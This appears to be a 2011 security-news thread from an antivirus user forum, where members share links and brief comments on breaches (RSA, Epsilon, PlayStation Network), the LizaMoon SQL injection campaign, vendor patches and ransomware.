http://news.cnet.com/8301-27080_3-20039385-245.html
WordPress.com DDoS Attacks Primarily From China
http://techcrunch.com/2011/03/04/wordpress/
-
Plaintext injection in STARTTLS
http://www.securityfocus.com/archive/1/516901/30/0/threaded
http://www.kb.cert.org/vuls/id/555316
-
USB driver bug exposed as "Linux plug&pwn"
http://www.h-online.com/open/news/item/USB-driver-bug-exposed-as-Linux-plug-pwn-1203617.html
-
***
Q4 Malware Update: Significant Rise in Malvertising Attacks, Social Networking Sites Easy Distribution Platforms for Malware
THE Q4 HIGHLIGHTS WERE:
* Malvertising is on a significant rise, having doubled from Q3 to Q4 2010.
* More than one million web sites were estimated to be infected in Q4 2010.
* The probability that an average Internet user will hit an infected page after three months of web browising is 95%.
* The top attacker domain was ipq.com, a free DNS forwarding service.
* Most social media networks are prone to being used as distribution platforms for malware.
The rest of the story is at the link below:
http://blog.dasient.com/2011/03/dasient-q4-malware-update-significant.html
***
-
Apple releases Java security updates
http://www.h-online.com/security/news/item/Apple-releases-Java-security-updates-1204690.html
-
Anonymous now attacks the US music industry
http://www.h-online.com/security/news/item/Anonymous-now-attacks-the-US-music-industry-1205391.html
-
Anonymous now attacks the US music industry
http://www.h-online.com/security/news/item/Anonymous-now-attacks-the-US-music-industry-1205391.html
Their methods may not be expectable but I don't know if their message is totally off track.
I haven't always agree with the methods used by RIAA either. ;D
-
MHTML vulnerability under active exploitation
http://googleonlinesecurity.blogspot.com/2011/03/mhtml-vulnerability-under-active.html
-
Photobucket Spoofing email scam. (http://blog.photobucket.com/blog/2011/03/spoofing-email-scam-notification.html)
-
Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-01.html
-
not a warning against anything in particular but a good move from Twitter:
http://blog.twitter.com/2011/03/making-twitter-more-secure-https.html
this was already possible manually, now this can be permanently set on your account (if you have one), just like Google does it with Gmail.
-
Click-jacking is spreading on Facebook
http://www.h-online.com/security/news/item/Click-jacking-is-spreading-on-Facebook-1207312.html
-
Click-jacking is spreading on Facebook
http://www.h-online.com/security/news/item/Click-jacking-is-spreading-on-Facebook-1207312.html
They mentioned IE7 as the browser that made this work. Wonder if IE9 is also susceptible and how about Chrome ???
-
Click-jacking is spreading on Facebook
http://www.h-online.com/security/news/item/Click-jacking-is-spreading-on-Facebook-1207312.html
They mentioned IE7 as the browser that made this work. Wonder if IE9 is also susceptible and how about Chrome ???
Don't know about IE9, but Chrome seems to be ok.
While the trick worked smoothly in Internet Explorer 7 under Windows XP, clicking in Firefox or Chrome did not result in a Facebook status post.
-
CanSecWest: game consoles spread viruses within LANs
http://www.h-online.com/security/news/item/CanSecWest-game-consoles-spread-viruses-within-LANs-1209069.html
-
"Phishers Have No Mercy for Japan"
http://www.symantec.com/connect/blogs/phishers-have-no-mercy-japan
-
And more Japan scam
Not surprisingly - nevertheless disgusting - the recent events in Japan have inspired shameless exploitations by cybercriminals.
http://www.norman.com/security_center/security_center_archive/2011/shamelessly_exploiting_disasters/no
-
"Privacy group demands answers from Skype"
http://www.theregister.co.uk/2011/03/16/skype_security_holes/
-
Phishing Scam in an HTML Attachment
http://labs.m86security.com/2011/03/phishing-scam-in-an-html-attachment/
-
I know this is very old (2004), but I just found it and this is so funny ;D
Passwords revealed by sweet deal
More than 70% of people would reveal their computer password in exchange for a bar of chocolate, a survey has found.
http://news.bbc.co.uk/2/hi/technology/3639679.stm
-
RSA hack could endanger the security of SecurID tokens
http://www.h-online.com/security/news/item/RSA-hack-could-endanger-the-security-of-SecurID-tokens-1210393.html
http://forum.avast.com/index.php?topic=74077.0
-
RSA hack could endanger the security of SecurID tokens
http://www.h-online.com/security/news/item/RSA-hack-could-endanger-the-security-of-SecurID-tokens-1210393.html
http://forum.avast.com/index.php?topic=74077.0
http://forum.avast.com/index.php?topic=74077.msg614434#msg614434
-
Hmmm...??? I already linked to your thread. ;)
asyn
-
PHP developer wiki server hacked
http://www.h-online.com/open/news/item/PHP-developer-wiki-server-hacked-1211874.html
-
I wonder who is the first to make an AV for cars :o
With hacking, music can take control of your car
http://www.itworld.com/security/139794/with-hacking-music-can-take-control-your-car
-
Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-01.html
Security updates available for Adobe Reader and Acrobat
http://www.adobe.com/support/security/bulletins/apsb11-06.html
Edit: For Flash Player see here: http://forum.avast.com/index.php?topic=9671.msg616370#msg616370
-
Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-01.html
Security updates available for Adobe Reader and Acrobat
http://www.adobe.com/support/security/bulletins/apsb11-06.html
Edit: For Flash Player see here: http://forum.avast.com/index.php?topic=9671.msg616370#msg616370
OT: You're better off not installing Adobe Reader because of security holes every time you update the patch, and you'll be a lot safer using PDF-XChange Viewer or something better that has less problems and yes you still have to update the Flash Player.
-
OT: You're better off not installing Adobe Reader because of security holes every time you update the patch, and you'll a lot safer using PDF-XChange Viewer or something better that has less problems and yes you still have to update the Flash Player.
You're right, that's OT, but much more important: it's true.!! :)
I also use PDF-XChange Viewer... ;)
asyn
-
yeah I was wondering, couldn't find the Adobe Reader 10.0.2 update for Windows,just for Mac... it's really not clear at all ::)
Adobe recommends users of Adobe Acrobat X (10.0.1) for Windows and Macintosh update to Adobe Acrobat X (10.0.2)
Because Adobe Reader X Protected Mode would prevent an exploit of this kind from executing, we are planning to address this issue in Adobe Reader X for Windows with the next quarterly security update for Adobe Reader, currently scheduled for June 14, 2011.
... wondering what they've been smoking lately @Adobe ::)
and then this thread here:
http://forums.adobe.com/thread/825916
-
Security flaw in RealPlayer
http://www.h-online.com/security/news/item/Security-flaw-in-RealPlayer-1213044.html
-
Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-01.html
Wow, their patch policy rocks... ::)
Because Adobe Reader X Protected Mode would prevent an exploit of this kind from executing, we are planning to address this issue in Adobe Reader X for Windows with the next quarterly security update for Adobe Reader, currently scheduled for June 14, 2011
For those who still have not abandoned the junk: PDF-XChange Viewer (http://www.tracker-software.com/product/pdf-xchange-viewer) (available also in native 64bit variant) or Foxit Reader (http://www.foxitsoftware.com/pdf/reader/addons.php/) (if you are after something fast and small).
-
666.624 IPv4 addresses sold for $7.5M to Microsoft
http://www.norman.com/security_center/blog/righard_zwienenberg/144541/en-us
-
Google Picasa Insecure Library Loading Vulnerability
http://secunia.com/advisories/43853/
Solution
Update to version 3.8.
-
Google Picasa Insecure Library Loading Vulnerability
http://secunia.com/advisories/43853/
Solution
Update to version 3.8.
Already up to date.
-
Spotify ads hit by malware attack
http://www.bbc.co.uk/news/technology-12891182
Also links to avast and websense blogs on the subject in the article
-
Spotify ads hit by malware attack
http://www.bbc.co.uk/news/technology-12891182
Also links to avast and websense blogs on the subject in the article
Also on avast! blog:
Malware stops the music at Spotify.com
https://blog.avast.com/2011/03/28/malware-stops-the-music-at-spotify-com
-
When buffer overflows in printers become a risk
http://www.h-online.com/security/news/item/When-buffer-overflows-in-printers-become-a-risk-1217292.html
-
VMware Security Advisory - VMware vmrun utility local privilege escalation
https://www.vmware.com/security/advisories/VMSA-2011-0006.html
-
Is Samsung Installing Keyloggers on New Laptops ???
You be the judge! (http://chris.pirillo.com/is-samsung-installing-keyloggers-on-new-laptops/)
-
Is Samsung Installing Keyloggers on New Laptops ???
You be the judge! (http://chris.pirillo.com/is-samsung-installing-keyloggers-on-new-laptops/)
http://forum.avast.com/index.php?topic=75041.msg621801#msg621801
-
Is Samsung Installing Keyloggers on New Laptops ???
You be the judge! (http://chris.pirillo.com/is-samsung-installing-keyloggers-on-new-laptops/)
yep... I went too fast yesterday when referring to the fact that CNet didn't find the keylogger, and the statement about a Vipre FP ... don't know what I was thinking of ::) forgot that indeed Samsung themselves, at least a rep, admitted it, they they indeed installed that crap on laptops.
-
Is Samsung Installing Keyloggers on New Laptops ???
You be the judge! (http://chris.pirillo.com/is-samsung-installing-keyloggers-on-new-laptops/)
http://forum.avast.com/index.php?topic=75041.msg621801#msg621801
Asyn that doesn't make sense, Samsung acknowledged the presence of the keylogger.
-
Asyn that doesn't make sense, Samsung acknowledged the presence of the keylogger.
http://www.samsungtomorrow.com/1071
-
Asyn that doesn't make sense, Samsung acknowledged the presence of the keylogger.
http://www.samsungtomorrow.com/1071
again, a samsung rep acknowledged the existence of the keylogger before anyone there mentioned a Vipre FP.
-
again, a samsung rep acknowledged the existence of the keylogger before anyone there mentioned a Vipre FP.
We should discuss this in the other thread, if needed. ;)
-
http://www.theinquirer.net/inquirer/news/2039497/thousands-websites-infected-sql-injection-attack
Thousands of websites infected by SQL injection attack
Around 1.5 million URLs infected
AN SQL INJECTION ATTACK campaign is spreading like wildfire, with 28,000 URLs that were initially reported to have infected code increasing to around 1.5 million within about four days.
In its latest update, Websense said that 1.5 million URLs have the same structure as the original attack. Although the figures only count URLs rather than individual domains or websites, the number of websites that have been compromised is likely to be in the thousands by now.
The first domain that Websense saw infected with bad code on 29 March was called Lizamoon.com. From there the infected script spreads to other websites through SQL injection, a technique that exploits insecure code through the database backend of a website.............(more)
More here
http://www.theregister.co.uk/2011/03/31/lizamoon_mass_injection_attack/
-
Thousands of websites infected by SQL injection attack
No idea, which browser you're using...
But, if you use FF, add NoScript - problem solved..! :)
asyn
-
Dissecting the Massive SQL Injection Attack Serving Scareware
Wonderful stuff by Dancho. Must read
http://ddanchev.blogspot.com/2011/03/dissecting-massive-sql-injection-attack.html
-
Thousands of websites infected by SQL injection attack
No idea, which browser you're using...
But, if you use FF, add NoScript - problem solved..! :)
asyn
The SQL injection has nothing to do with your browser as the injection is into the page source code. We have seen several instances of the lizamoon . com injected scripts being blocked by the Web Shield as win32:Script-inf detection.
Whilst NoScript should stop the script being run (so should NotScript for Chrome), unless you have very lax NoScript settings, so it isn't guaranteed.
So for now be thankful that the web shield is your protector in these injected scripts.
-
1. Whilst NoScript should stop the script being run ... so it isn't guaranteed.
2. So for now be thankful that the web shield is your protector in these injected scripts.
1. It is. ;)
2. I/we am/are. :)
-
Interesting, this ur.php file also featured in another thread.
http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx
Thread is here: http://forum.avast.com/index.php?topic=75016.msg621057#msg621057
-
I just received this:
"Kroger wants you to know that the data base with our customers' names and email addresses has been breached by someone outside of the company. This data base contains the names and email addresses of customers who voluntarily provided their names and email addresses to Kroger. We want to assure you that the only information that was obtained was your name and email address. As a result, it is possible you may receive some spam email messages. We apologize for any inconvenience."
So if you shop at Kroger or Smith's and supplied them with your email address,
expect an increase in your spam and not the kind you eat either.
I wanted to ask them if they'll give us a discount on Spam the next time we do our shopping.... ;D
-
RSA hack could endanger the security of SecurID tokens
http://www.h-online.com/security/news/item/RSA-hack-could-endanger-the-security-of-SecurID-tokens-1210393.html
http://forum.avast.com/index.php?topic=74077.0
Anatomy of an Attack
http://blogs.rsa.com/rivner/anatomy-of-an-attack/
-
I just received this:
"Kroger wants you to know that the data base with our customers' names and email addresses has been breached by someone outside of the company. This data base contains the names and email addresses of customers who voluntarily provided their names and email addresses to Kroger. We want to assure you that the only information that was obtained was your name and email address. As a result, it is possible you may receive some spam email messages. We apologize for any inconvenience."
So if you shop at Kroger or Smith's and supplied them with your email address,
expect an increase in your spam and not the kind you eat either.
Millions of email addresses exposed in Epsilon breach
http://www.h-online.com/security/news/item/Millions-of-email-addresses-exposed-in-Epsilon-breach-1221307.html
-
Millions of email addresses exposed in Epsilon breach
http://www.h-online.com/security/news/item/Millions-of-email-addresses-exposed-in-Epsilon-breach-1221307.html
It gets worse by the day:
Epsilon Security Breach Spreads:
https://threatpost.com/en_us/blogs/epsilon-data-breach-expands-include-capital-one-disney-others-040411 (https://threatpost.com/en_us/blogs/epsilon-data-breach-expands-include-capital-one-disney-others-040411)
http://threatpost.com/en_us/blogs/list-companies-hit-epsilon-breach-040511 (http://threatpost.com/en_us/blogs/list-companies-hit-epsilon-breach-040511)
Update to those affected by this breach: To those living within the US, the phone number to call Epsilon for additional information regarding this breach is 1-866-595-4896. However, Epsilon is a global company. I contacted them and was told that hackers gained information from Epsilon, however the only information they gained were email addresses. The concern is that the hackers are now sending out email to the emails the obtained with malicious codes (they would not offer when pressed what malware is involved or where the hackers originated from as they "could not disclose that information" to me), and Epsilon is advising users when you contact them to not open up emails you do not recognize and to keep your antivirus and firewall up to date. Epsilon refuses to disclose additional information and will not offer free ID Theft to users who were affected as of contacting them 4/05/11.
-
Millions of email addresses exposed in Epsilon breach
http://www.h-online.com/security/news/item/Millions-of-email-addresses-exposed-in-Epsilon-breach-1221307.html
It gets worse by the day:
Epsilon Security Breach Spreads:
https://threatpost.com/en_us/blogs/epsilon-data-breach-expands-include-capital-one-disney-others-040411 (https://threatpost.com/en_us/blogs/epsilon-data-breach-expands-include-capital-one-disney-others-040411)
http://threatpost.com/en_us/blogs/list-companies-hit-epsilon-breach-040511 (http://threatpost.com/en_us/blogs/list-companies-hit-epsilon-breach-040511)
Additional info here: http://krebsonsecurity.com/2011/04/epsilon-breach-raises-specter-of-spear-phishing/
-
and more about Epsilon here
To the Millions and Millions of people
How not to warn the Millions!
http://norman.com/security_center/blog/righard_zwienenberg/144731/en-us
-
Google Chrome to warn of malicious Windows executables
http://www.theregister.co.uk/2011/04/05/google_malicious_executables_warning/
-
and more about Epsilon here
To the Millions and Millions of people… How not to warn the Millions!
http://norman.com/security_center/blog/righard_zwienenberg/144731/en-us
A list of the companies who used Epsilon Services:
http://www.databreaches.net/?p=17374 (http://www.databreaches.net/?p=17374)
-
LiveJournal under attack
DDoS attack - Optima/Darkness DDoS bot
http://www.securelist.com/en/blog/442/LiveJournal_under_attack
-
Monthly Malware Statistics, March 2011
http://www.securelist.com/en/analysis/204792170/Monthly_Malware_Statistics_March_2011
A new chinese bootkit http://www.securelist.com/en/blog/434/The_Chinese_bootkit
-
DHCP client allows shell command injection
http://www.h-online.com/security/news/item/DHCP-client-allows-shell-command-injection-1222805.html
-
The PlayStation 3 controversy - Anonymous enters the scene
http://www.norman.com/security_center/security_center_archive/2011/playstation_3_controversy_anonymous_enters_the_scene/en-us
-
"Successful" Twitter malware proves it once more
http://www.norman.com/security_center/blog/per_olav_forland/144829/en-us
-
The PlayStation 3 controversy - Anonymous enters the scene
http://www.norman.com/security_center/security_center_archive/2011/playstation_3_controversy_anonymous_enters_the_scene/en-us
http://anonnews.org/?p=press&a=item&i=797
-
Malware baddies crank up Trojan production
http://www.theregister.co.uk/2011/04/06/malware_trends/
During the first three months of 2011 an average of 73,000 new strains of malware have been created every day: 10,000 more than during the same period last year, according to stats from Panda Security. Around 70 per cent of these malware strains were Trojans, with viruses making up 17 per cent of the sample, the second most common category.
Google Chrome to warn of malicious Windows executables
http://www.theregister.co.uk/2011/04/05/google_malicious_executables_warning/
Google says it's expanding its blacklist of malicious websites to include those that use deceptive claims to push harmful Windows programs.
-
Lots of flags on Hotmail / Windows Live site today. I'm not alone.
-
Lots of flags on Hotmail / Windows Live site today. I'm not alone.
It was FP and has been solved meanwhile...!!! ;)
http://forum.avast.com/index.php?topic=75653.0
Doesn't really fit here, btw.
asyn
-
Microsoft Security Bulletin Advance Notification for April 2011
This is an advance notification of security bulletins that Microsoft is intending to release on April 12, 2011.
http://www.microsoft.com/technet/security/bulletin/ms11-apr.mspx
-
VLC Media Player susceptible to buffer overflow vulnerability
http://www.h-online.com/security/news/item/VLC-Media-Player-susceptible-to-buffer-overflow-vulnerability-1224431.html
-
Dropbox authentication: insecure by design
http://dereknewton.com/2011/04/dropbox-authentication-static-host-ids/
-
A new security flaw hits VLC
http://www.h-online.com/security/news/item/A-new-security-flaw-hits-VLC-1225820.html
-
Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-02.html
-
Facebook fixes bug affecting Hotmail users
http://news.cnet.com/8301-27080_3-20052926-245.html
-
A new security flaw hits VLC
http://www.h-online.com/security/news/item/A-new-security-flaw-hits-VLC-1225820.html
VLC Media Player 1.1.9 closes security holes
http://www.h-online.com/security/news/item/VLC-Media-Player-1-1-9-closes-security-holes-1226673.html
-
Ransomware claims to lock Windows licence
http://www.h-online.com/security/news/item/Ransomware-claims-to-lock-Windows-licence-1226789.html
-
Ransomware claims to lock Windows licence
http://www.h-online.com/security/news/item/Ransomware-claims-to-lock-Windows-licence-1226789.html
Oh, that would suck. Can't wait to have to fix a system with this installed. I have a feeling a lot of old people are going to be falsely opening up their wallets for this one.
-
Ransomware claims to lock Windows licence
http://www.h-online.com/security/news/item/Ransomware-claims-to-lock-Windows-licence-1226789.html
Oh, that would suck. Can't wait to have to fix a system with this installed. I have a feeling a lot of old people are going to be falsely opening up their wallets for this one.
Just use the code : 1351236 More here (http://www.f-secure.com/weblog/archives/00002139.html).
-
Ransomware claims to lock Windows licence
http://www.h-online.com/security/news/item/Ransomware-claims-to-lock-Windows-licence-1226789.html
Oh, that would suck. Can't wait to have to fix a system with this installed. I have a feeling a lot of old people are going to be falsely opening up their wallets for this one.
Just use the code : 1351236 More here (http://www.f-secure.com/weblog/archives/00002139.html).
Also http://xylibox.blogspot.com/2011/03/trojanransom-windows-license-locked.html
-
WordPress - Security Incident
http://en.blog.wordpress.com/2011/04/13/security/
-
WordPress - Security Incident
http://en.blog.wordpress.com/2011/04/13/security/
yeah on a side note, they sent that via mail to all their users, which I find rather fair and professional.
-
yeah on a side note, they sent that via mail to all their users, which I find rather fair and professional.
.com or .org? I didn't get one...and I use the .com service...
-
yeah on a side note, they sent that via mail to all their users, which I find rather fair and professional.
.com or .org? I didn't get one...and I use the .com service...
.com ... but okay, I wanted to post back here. I opened a blog there very recently and subscribed to their blog at the same time (was offered during the registration process). What I got via mail is just the last post from their blog.
-
yeah on a side note, they sent that via mail to all their users, which I find rather fair and professional.
.com or .org? I didn't get one...and I use the .com service...
.com ... but okay, I wanted to post back here. I opened a blog there very recently and subscribed to their blog at the same time (was offered during the registration process). What I got via mail is just the last post from their blog.
Ah, that explains it, I haven't subscribed...think I have the rss feed somewhere though :D
-
Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-02.html
Adobe to patch Flash Player hole Friday
http://blogs.adobe.com/psirt/2011/04/update-on-security-advisory-for-adobe-flash-player-adobe-reader-and-acrobat-apsa11-02.html
-
Problem with PowerPoint update
Security Update for PowerPoint 2003 (KB2464588)
http://support.microsoft.com/kb/2464588
-
Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-02.html
Adobe to patch Flash Player hole Friday
http://blogs.adobe.com/psirt/2011/04/update-on-security-advisory-for-adobe-flash-player-adobe-reader-and-acrobat-apsa11-02.html
Adobe releases security update for Flash Player
http://www.h-online.com/security/news/item/Adobe-releases-security-update-for-Flash-Player-1228930.html
-
iTunes 10.2.2 closes security holes
http://www.h-online.com/security/news/item/iTunes-10-2-2-closes-security-holes-1229838.html (http://www.h-online.com/security/news/item/iTunes-10-2-2-closes-security-holes-1229838.html)
-
Ashampoo hacked (http://www.ashampoo.com/en/usd/dth) :'(
-
Ashampoo hacked (http://www.ashampoo.com/en/usd/dth) :'(
Sad... My email/name were stolen :'(
-
Ashampoo hacked (http://www.ashampoo.com/en/usd/dth) :'(
Sad... My email/name were stolen :'(
I'm sure your not alone. I also use some of their excellent products.
-
Yes I have their handy little screen capture tool AshampooSnap3 on my win7 netbook. Not quite as good as SnagIt on my main system but then it is free ;D
Can't say I have noticed any spam, etc. I opted out of their email promotions early on.
-
Yes I have their handy little screen capture tool AshampooSnap3 on my win7 netbook. Not quite as good as SnagIt on my main system but then it is free ;D
I use Snipping Tool which comes built-in with windows 7
Can't say I have noticed any spam, etc. I opted out of their email promotions early on.
Same here :-\
-
Yes I have their handy little screen capture tool AshampooSnap3 on my win7 netbook. Not quite as good as SnagIt on my main system but then it is free ;D
I use Snipping Tool which comes built-in with windows 7
<snip>
I have never used it, but I rather doubt it has the functionality of AshampooSnap3, which has image editing and a slew of other functions than you can shake a stick at.
One that I particularly like is the image capture and a save output directly to email, video capture, capture scrolling window (text & Web site) and the annotations are very varied, etc..
-
One that I particularly like is the image capture and a save output directly to email
No
video capture
No..
capture scrolling window (text & Web site)
Nooooo
and the annotations are very varied, etc..
No no no nooooooooo!
;D
-
FakeAV names itself BitDefender
http://www.bleepingcomputer.com/virus-removal/remove-bitdefender-2011
Or AVG :D
http://siri-urz.blogspot.com/2011/01/fake-avg-anti-virus.html
-
Oracle Critical Patch Update Advisory - April 2011
http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html
-
Digital Life after death - Online ???
http://www.norman.com/security_center/blog/per_olav_forland/145976/en
Digital Afterlife: How to Safeguard Online Accounts After Death
http://www.securitynewsdaily.com/digital-afterlife-how-to-safeguard-online-accounts-after-death-0707/
-
PlayStation Network & Qriocity services turned off
http://blog.eu.playstation.com/2011/04/23/update-on-playstation-network-qriocity-services/
Update: http://anonops.blogspot.com/2011/04/we-didnt-do-it-sony-incompetent.html
Update: http://blog.eu.playstation.com/2011/04/24/latest-update-for-psnqriocity-services/
-
Malwarebytes with new WebSite http://malwarebytes.org/
-
Microsoft now disclosing third party vulnerabilities
http://www.h-online.com/security/news/item/Microsoft-now-disclosing-third-party-vulnerabilities-1233047.html
-
Link not working.
-
Link not working.
Are you refering to my post, Bob..??
If so, it's working from here...
Microsoft now disclosing third party vulnerabilities
http://www.h-online.com/security/news/item/Microsoft-now-disclosing-third-party-vulnerabilities-1233047.html
-
Link not working.
It helps to say what Link is not working. ;)
-
Microsoft now disclosing third party vulnerabilities
http://www.h-online.com/security/news/item/Microsoft-now-disclosing-third-party-vulnerabilities-1233047.html
very interesting! Does it may happen that Microsoft become a secure platform? ;D
-
Actually I find windows(7) quite secure - most flaws are from third party software - Adobe - Flash - Java etc..
-
Actually I find windows(7) quite secure - most flaws are from third party software - Adobe - Flash - Java etc..
I will not call it secure until windows core/source become really solid and un-touchable like you feel every file or program you run is being opened in a sandbox, when you uninstall a program no leftover remain or no kind of input being able change anything from windows core. (Emmm, like a Chrome Extension which cannot change the way whole browser works, or like a JAVA mobile OS which applications cannot change the way mobile OS works)
-
I do say quite secure... ;D But a lot of the problems are dependant on the third party software manufactures to get their act together - Like as you say Chrome. Windows cannot be locked up tight though as long as third party software is used
-
I do say quite secure... ;D But a lot of the problems are dependant on the third party software manufactures to get their act together - Like as you say Chrome. Windows cannot be locked up tight though as long as third party software is used
Like Avira. ;)
-
PlayStation Network & Qriocity services turned off
http://blog.eu.playstation.com/2011/04/23/update-on-playstation-network-qriocity-services/
Update: http://anonops.blogspot.com/2011/04/we-didnt-do-it-sony-incompetent.html
Update: http://blog.eu.playstation.com/2011/04/24/latest-update-for-psnqriocity-services/
Update on PSN Service Outages
http://faq.en.playstation.com/cgi-bin/scee_gb.cfg/php/enduser/std_adp.php?locale=en_GB&p_faqid=5593
We believe that an unauthorized person has obtained the following information that you provided: name, address (city, state/province, zip or postal code), country, email address, birthdate, PlayStation Network/Qriocity password, login, password security answers, and handle/PSN online ID...
...If you have provided your credit card data through PlayStation Network or Qriocity, it is possible that your credit card number (excluding security code) and expiration date may also have been obtained.
-
PlayStation Network & Qriocity services turned off
http://blog.eu.playstation.com/2011/04/23/update-on-playstation-network-qriocity-services/
Update: http://anonops.blogspot.com/2011/04/we-didnt-do-it-sony-incompetent.html
Update: http://blog.eu.playstation.com/2011/04/24/latest-update-for-psnqriocity-services/
Update on PSN Service Outages
http://faq.en.playstation.com/cgi-bin/scee_gb.cfg/php/enduser/std_adp.php?locale=en_GB&p_faqid=5593
We believe that an unauthorized person has obtained the following information that you provided: name, address (city, state/province, zip or postal code), country, email address, birthdate, PlayStation Network/Qriocity password, login, password security answers, and handle/PSN online ID...
...If you have provided your credit card data through PlayStation Network or Qriocity, it is possible that your credit card number (excluding security code) and expiration date may also have been obtained.
Even if you aren't a gamer (such as I) but used your Playstation to obtain other services like Netflix, then consider yourself hacked. :'(
-
Even if you aren't a gamer (such as I) but used your Playstation to obtain other services like Netflix, then consider yourself hacked. :'(
Some already consider this the biggest all-time data theft. :(
(80+ millions possible victims)
-
there's been a sarcastic statement from MS somewhere... saying they "really" were sorry for Sony, but hey thanks god players still have the Xbox network to rely on ;D
-
there's been a sarcastic statement from MS somewhere... saying they "really" were sorry for Sony, but hey thanks god players still have the Xbox network to rely on ;D
Seems they see it as an unique promotion chance. ;)
Do you have a link for that, Logos..??
-
SpyEye Targets Opera, Google Chrome Users
http://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/
-
Problem with PowerPoint update
Security Update for PowerPoint 2003 (KB2464588)
http://support.microsoft.com/kb/2464588
Hotfix available: http://support.microsoft.com/kb/2543241/en-us
-
Zeus trojan adds fake investment adverts
http://www.h-online.com/security/news/item/Zeus-trojan-adds-fake-investment-adverts-1233415.html
http://www.trusteer.com/blog/zeus-adds-investment-fraud-its-bag-tricks
-
Not sure if this has already been posted....
apr 26-2011 Update on PlayStation Network and Qriocity
http://blog.us.playstation.com/2011/04/26/update-on-playstation-network-and-qriocity/
-
a digital thriller book review ;)
Zero Day - a review
http://www.norman.com/security_center/blog/per_olav_forland/145996/en
-
Not sure if this has already been posted....
Not the US version, but everything else is here:
http://forum.avast.com/index.php?topic=52252.msg638566#msg638566
-
A Second MSRT Release in April
http://blogs.technet.com/b/mmpc/archive/2011/04/26/a-second-msrt-release-in-april.aspx
-
Cisco Security Advisory
Multiple Vulnerabilities in Cisco Unified Communications Manager
http://www.cisco.com/warp/public/707/cisco-sa-20110427-cucm.shtml
Cisco Wireless LAN Controllers Denial of Service Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20110427-wlc.shtml
-
PlayStation Network & Qriocity services turned off
http://blog.eu.playstation.com/2011/04/23/update-on-playstation-network-qriocity-services/
Update: http://anonops.blogspot.com/2011/04/we-didnt-do-it-sony-incompetent.html
Update: http://blog.eu.playstation.com/2011/04/24/latest-update-for-psnqriocity-services/
Update on PSN Service Outages
http://faq.en.playstation.com/cgi-bin/scee_gb.cfg/php/enduser/std_adp.php?locale=en_GB&p_faqid=5593
Q&A #1 for PlayStation Network and Qriocity Services
http://blog.us.playstation.com/2011/04/27/qa-1-for-playstation-network-and-qriocity-services/
Attack on the PlayStation Network: what customers should now watch out for
http://www.h-online.com/security/news/item/Attack-on-the-PlayStation-Network-what-customers-should-now-watch-out-for-1233905.html
-
A Second MSRT Release in April
http://blogs.technet.com/b/mmpc/archive/2011/04/26/a-second-msrt-release-in-april.aspx
probably related to the same infection:
Feds to remotely delete Coreflood from infected PCs
http://www.digitaltrends.com/computing/feds-to-remotely-delete-coreflood-from-infected-pcs/
-
Great, sign a consent form to have the Feds rummage around in your computer. Not sure which would be more attractive in your system, the botnet or the Feds ;D
-
Great, sign a consent form to have the Feds rummage around in your computer. Not sure which would be more attractive in your system, the botnet or the Feds ;D
they say they won't spy ??? ;D
-
Nikon Image Authentication System: Compromised
http://blog.crackpassword.com/2011/04/nikon-image-authentication-system-compromised/
-
FBI warns of fraudulent bank transfers to China
http://www.h-online.com/security/news/item/FBI-warns-of-fraudulent-bank-transfers-to-China-1234421.html
http://www.ic3.gov/media/2011/ChinaWireTransferFraudAlert.pdf
-
Iran: Country under attack by second computer virus
http://malwareresearchgroup.com/2011/04/iran-country-under-attack-by-second-computer-virus/ (http://malwareresearchgroup.com/2011/04/iran-country-under-attack-by-second-computer-virus/)
-
Iran: Country under attack by second computer virus
http://malwareresearchgroup.com/2011/04/iran-country-under-attack-by-second-computer-virus/ (http://malwareresearchgroup.com/2011/04/iran-country-under-attack-by-second-computer-virus/)
not much to complain about ;D
-
Dropbox authentication: insecure by design
http://dereknewton.com/2011/04/dropbox-authentication-static-host-ids/
Dropbox experiment with update to solve security vulnerability
http://www.h-online.com/security/news/item/Dropbox-experiment-with-update-to-solve-security-vulnerability-1234815.html
-
Dropbox authentication: insecure by design
http://dereknewton.com/2011/04/dropbox-authentication-static-host-ids/
Dropbox experiment with update to solve security vulnerability
http://www.h-online.com/security/news/item/Dropbox-experiment-with-update-to-solve-security-vulnerability-1234815.html
yeah I've installed that yesterday, that's a forum build, ie you'll only get the link from their forums ;)
-
yeah I've installed that yesterday, that's a forum build, ie you'll only get the link from their forums ;)
Ok, so just in case: http://forums.dropbox.com/topic.php?id=37258&%2037258
-
Iran: Country under attack by second computer virus
http://malwareresearchgroup.com/2011/04/iran-country-under-attack-by-second-computer-virus/ (http://malwareresearchgroup.com/2011/04/iran-country-under-attack-by-second-computer-virus/)
not much to complain about ;D
This might interest you then. ;)
http://anonnews.org/?p=press&a=item&i=873
-
careful guys, for those of you using LastPass, the version available on Mozilla add-ons web site is outdated, it's 1.72:
https://addons.mozilla.org/en-US/firefox/addon/lastpass-password-manager/
while the latest has been 1.73 for a while. Get it here:
https://lastpass.com/misc_download.php
-
PlayStation Network & Qriocity services turned off
http://blog.eu.playstation.com/2011/04/23/update-on-playstation-network-qriocity-services/
Update: http://anonops.blogspot.com/2011/04/we-didnt-do-it-sony-incompetent.html
Update: http://blog.eu.playstation.com/2011/04/24/latest-update-for-psnqriocity-services/
Update on PSN Service Outages
http://faq.en.playstation.com/cgi-bin/scee_gb.cfg/php/enduser/std_adp.php?locale=en_GB&p_faqid=5593
Q&A #1 for PlayStation Network and Qriocity Services
http://blog.us.playstation.com/2011/04/27/qa-1-for-playstation-network-and-qriocity-services/
Attack on the PlayStation Network: what customers should now watch out for
http://www.h-online.com/security/news/item/Attack-on-the-PlayStation-Network-what-customers-should-now-watch-out-for-1233905.html
Another 25 million Sony users compromised
